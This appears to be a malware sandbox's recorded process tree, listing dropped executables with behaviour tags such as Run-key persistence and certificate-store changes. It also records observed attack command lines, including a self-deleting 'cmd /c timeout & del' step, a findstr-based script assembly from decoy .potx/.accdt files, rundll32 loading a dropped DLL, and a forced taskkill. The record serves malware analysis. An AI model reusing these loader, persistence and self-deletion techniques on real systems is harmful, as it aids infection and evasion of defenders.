C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=2548 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=3316 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=3656 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=3504 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=828 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=3620 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_FCBE.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A196A59073637D21E69FA56757EE53DC2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
- Checks processor information in registry
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8301AA6DFA91E3D62D36123A6FB9FBD4 E Global\MSI00002⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\630D.exeC:\Users\Admin\AppData\Local\Temp\630D.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7061d1fd-99c1-684f-84b2-e27ae0f2350c}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\45F.exeC:\Users\Admin\AppData\Local\Temp\45F.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\45F.exeC:\Users\Admin\AppData\Local\Temp\45F.exe2⤵
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1FE6.exeC:\Users\Admin\AppData\Local\Temp\1FE6.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1FE6.exeC:\Users\Admin\AppData\Local\Temp\1FE6.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1FE6.exeC:\Users\Admin\AppData\Local\Temp\1FE6.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\2A57.exeC:\Users\Admin\AppData\Local\Temp\2A57.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\369D.exeC:\Users\Admin\AppData\Local\Temp\369D.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\369D.exeC:\Users\Admin\AppData\Local\Temp\369D.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\49B9.exeC:\Users\Admin\AppData\Local\Temp\49B9.exe1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess2⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.205.1003.0005\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.205.1003.0005\FileSyncConfig.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\B46A.exeC:\Users\Admin\AppData\Local\Temp\B46A.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E29F.exeC:\Users\Admin\AppData\Local\Temp\E29F.exe1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\F6A5.exeC:\Users\Admin\AppData\Local\Temp\F6A5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\MarsBuild_2021-11-14_11-20.exe"C:\Users\Admin\AppData\Local\Temp\MarsBuild_2021-11-14_11-20.exe"2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\MarsBuild_2021-11-14_11-20.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\clean.exe"C:\Users\Admin\AppData\Local\Temp\clean.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\OQTGVRp.exe"C:\Users\Admin\AppData\Local\Temp\OQTGVRp.exe"2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\makecab.exemakecab3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Duro.potx3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdynOpYGXnWkzSuDQWhFskbJYxaqZbxLWAnCRclynOJXkaaxpyDmJmtnSvAxQXHArlfSxDLxLiiDBmnGwYRUUVevcZJcVQgAupUqemqFzoNBaA$" Due.potx5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comForma.exe.com b5⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b6⤵
- Modifies system certificate store
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b7⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b8⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b9⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b11⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b12⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b13⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b18⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Forma.exe.com b20⤵
- Checks whether UAC is enabled
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\clean.exe"C:\Users\Admin\AppData\Local\Temp\clean.exe"2⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
-
C:\Users\Admin\AppData\Local\Temp\QdUPABU.exe"C:\Users\Admin\AppData\Local\Temp\QdUPABU.exe"2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\makecab.exemakecab3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Aggrava.accdt3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ShpzYFLbYRfWJuFRXyNbzLysSxWtdBORrgKocLRwRlexRlxdHPIcxtdioSAEIHivrnSxvvvjgLGoIKmHZGvBSzvYYDqDljzlrGszaqTlaviIninbaTFelFEKwTcTvTew$" Pie.accdt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comUdi.exe.com k5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k6⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k8⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k9⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k11⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k12⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k13⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k18⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Udi.exe.com k20⤵
- Checks whether UAC is enabled
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
